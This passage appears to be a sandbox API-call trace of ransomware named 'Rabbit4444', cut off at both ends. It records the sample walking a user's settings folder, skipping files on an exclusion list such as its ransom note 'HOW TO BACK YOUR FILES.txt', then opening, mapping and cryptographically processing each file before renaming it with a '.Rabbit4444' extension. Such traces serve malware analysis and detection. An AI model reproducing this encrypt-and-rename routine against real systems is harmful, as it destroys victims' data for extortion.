(lpString1="Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.389] lstrcmpiW (lpString1="Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.389] lstrcmpiW (lpString1="Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms", lpString2="boot") returned 1 [0059.389] lstrcmpiW (lpString1="Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.389] lstrcmpiW (lpString1="Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.389] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms" | out: lpString1="Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms") returned="Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms" [0059.389] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.390] lstrlenW (lpString="Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms") returned 64 [0059.390] lstrlenW (lpString="Rabbit4444") returned 10 [0059.390] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.390] lstrlenW (lpString=".dll") returned 4 [0059.390] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.390] lstrlenW (lpString=".lnk") returned 4 [0059.390] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.390] lstrlenW (lpString=".ini") returned 4 [0059.390] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.390] lstrlenW (lpString=".sys") returned 4 [0059.390] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.390] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b935c3b6-969c-4fc2-b96c-7f06794471af}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.390] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.390] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15070096542) returned 1 [0059.390] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1022) returned 1 [0059.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0059.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0059.390] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x298 [0059.391] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x70000 [0059.392] CryptAcquireContextW (in: phProv=0x130bbd0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x130bbd0*=0x101fb8) returned 1 [0059.393] CryptGenRandom (in: hProv=0x101fb8, dwLen=0x80, pbBuffer=0x130bbec | out: pbBuffer=0x130bbec) returned 1 [0059.393] CryptReleaseContext (hProv=0x101fb8, dwFlags=0x0) returned 1 [0059.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.393] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15070426164) returned 1 [0059.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0059.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0059.394] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.394] CloseHandle (hObject=0x298) returned 1 [0059.394] CloseHandle (hObject=0x278) returned 1 [0059.394] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms.Rabbit4444") returned 192 [0059.394] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b935c3b6-969c-4fc2-b96c-7f06794471af}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b935c3b6-969c-4fc2-b96c-7f06794471af}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.395] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x554ee51a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x554ee51a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x232db48a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms", cAlternateFileName="CL016E~1.SET")) returned 1 [0059.395] lstrcmpiW (lpString1="Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.395] lstrcmpiW (lpString1="Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.395] lstrcmpiW (lpString1="Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.395] lstrcmpiW (lpString1="Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms", lpString2=".") returned 1 [0059.395] lstrcmpiW (lpString1="Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms", lpString2="..") returned 1 [0059.395] lstrcmpiW (lpString1="Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms", lpString2="windows") returned -1 [0059.395] lstrcmpiW (lpString1="Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.395] lstrcmpiW (lpString1="Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.395] lstrcmpiW (lpString1="Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms", lpString2="boot") returned 1 [0059.395] lstrcmpiW (lpString1="Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.395] lstrcmpiW (lpString1="Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.395] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms" | out: lpString1="Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms") returned="Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms" [0059.395] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.396] lstrlenW (lpString="Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms") returned 64 [0059.396] lstrlenW (lpString="Rabbit4444") returned 10 [0059.396] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.396] lstrlenW (lpString=".dll") returned 4 [0059.396] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.396] lstrlenW (lpString=".lnk") returned 4 [0059.396] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.396] lstrlenW (lpString=".ini") returned 4 [0059.396] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.396] lstrlenW (lpString=".sys") returned 4 [0059.396] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.396] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{babb24a6-0242-4ae5-bd83-c5816526f63d}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.396] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.396] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15070702076) returned 1 [0059.396] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1149) returned 1 [0059.396] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0059.396] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0059.396] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x780, lpName=0x0) returned 0x298 [0059.397] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x780) returned 0x70000 [0059.398] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.398] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0059.398] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.398] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0059.398] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.399] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0059.399] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.399] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0059.399] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15070953975) returned 1 [0059.399] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0059.399] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0059.399] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.399] CloseHandle (hObject=0x298) returned 1 [0059.399] CloseHandle (hObject=0x278) returned 1 [0059.399] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms.Rabbit4444") returned 192 [0059.399] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{babb24a6-0242-4ae5-bd83-c5816526f63d}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{babb24a6-0242-4ae5-bd83-c5816526f63d}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.400] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55586e82, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x55586e82, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2229d471, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms", cAlternateFileName="CL5272~1.SET")) returned 1 [0059.402] lstrcmpiW (lpString1="Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.402] lstrcmpiW (lpString1="Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.402] lstrcmpiW (lpString1="Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.402] lstrcmpiW (lpString1="Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms", lpString2=".") returned 1 [0059.402] lstrcmpiW (lpString1="Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms", lpString2="..") returned 1 [0059.402] lstrcmpiW (lpString1="Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms", lpString2="windows") returned -1 [0059.403] lstrcmpiW (lpString1="Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.403] lstrcmpiW (lpString1="Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.403] lstrcmpiW (lpString1="Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms", lpString2="boot") returned 1 [0059.403] lstrcmpiW (lpString1="Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.403] lstrcmpiW (lpString1="Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.403] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms" | out: lpString1="Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms") returned="Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms" [0059.403] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.403] lstrlenW (lpString="Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms") returned 64 [0059.403] lstrlenW (lpString="Rabbit4444") returned 10 [0059.403] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.403] lstrlenW (lpString=".dll") returned 4 [0059.403] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.403] lstrlenW (lpString=".lnk") returned 4 [0059.403] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.403] lstrlenW (lpString=".ini") returned 4 [0059.403] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.403] lstrlenW (lpString=".sys") returned 4 [0059.403] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.403] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.404] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.404] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15071442190) returned 1 [0059.404] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=832) returned 1 [0059.404] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0059.404] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0059.404] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x640, lpName=0x0) returned 0x298 [0059.405] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x640) returned 0x70000 [0059.406] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.406] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0059.406] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.406] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.406] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.406] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.406] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.406] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0059.406] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15071696548) returned 1 [0059.406] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0059.406] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0059.406] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.406] CloseHandle (hObject=0x298) returned 1 [0059.406] CloseHandle (hObject=0x278) returned 1 [0059.407] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms.Rabbit4444") returned 192 [0059.407] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.407] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5561f7ee, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5561f7ee, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2315dd0d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x357, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms", cAlternateFileName="CL1DD7~1.SET")) returned 1 [0059.407] lstrcmpiW (lpString1="Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.407] lstrcmpiW (lpString1="Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.407] lstrcmpiW (lpString1="Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.407] lstrcmpiW (lpString1="Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms", lpString2=".") returned 1 [0059.407] lstrcmpiW (lpString1="Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms", lpString2="..") returned 1 [0059.407] lstrcmpiW (lpString1="Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms", lpString2="windows") returned -1 [0059.407] lstrcmpiW (lpString1="Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.408] lstrcmpiW (lpString1="Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.408] lstrcmpiW (lpString1="Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms", lpString2="boot") returned 1 [0059.408] lstrcmpiW (lpString1="Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.408] lstrcmpiW (lpString1="Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.408] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms" | out: lpString1="Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms") returned="Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms" [0059.408] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.408] lstrlenW (lpString="Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms") returned 64 [0059.408] lstrlenW (lpString="Rabbit4444") returned 10 [0059.408] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.408] lstrlenW (lpString=".dll") returned 4 [0059.408] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.408] lstrlenW (lpString=".lnk") returned 4 [0059.408] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.408] lstrlenW (lpString=".ini") returned 4 [0059.408] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.408] lstrlenW (lpString=".sys") returned 4 [0059.408] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.409] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.409] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.409] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15071960924) returned 1 [0059.409] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=855) returned 1 [0059.409] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 